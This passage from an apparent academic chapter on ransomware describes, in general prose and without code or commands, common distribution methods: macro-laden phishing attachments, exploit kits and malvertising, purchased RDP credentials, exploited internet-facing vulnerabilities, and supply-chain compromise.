**3. Distribution methods**

Ransomware is spread through multiple distribution methods. These are as follows:

Phishing—The most common attack vector used by attackers as shown in **Figure 4**. Attackers send an email that is designed to lure the victim to open the weaponized office attachments. When the user opens the attachment (word or excel) and enables the macros, a malicious program is executed that executes a PowerShell command to download a 2nd stage malware from the Command and Control (C2) Server. Additional payloads are downloaded for lateral movement and once control is gained on the active directory

**Figure 4.** *Attack vector phishing.*

**Figure 5.** *Attack vector exploit kit.*

(AD) domain, the attacker downloads ransomware as a final payload and deploys it to multiple devices.

Exploit kits—An exploit kit is a toolkit designed to exploit vulnerabilities on victim's system while web browsing. When a user visits a compromised website, the victim is redirected to another landing page. The victim's machine is scanned for any browser-based vulnerabilities and malware is downloaded. Ransomware groups employ malvertising to redirect users to the attacker's website, exploit is executed that leads to the eventual deployment of ransomware (**Figure 5**).

Buying credentials from access brokers—Attackers buy credentials from initial access brokers (IABs) to gain initial access. Remote desktop protocol (RDP) is the most common credential used to achieve a foothold.

Exploiting vulnerabilities—Ransomware operators also gain initial access by exploiting vulnerabilities in Internet-facing applications.

3rd Party Vendor—Supply chain has become the latest attack vector that has led to ransomware deployment.
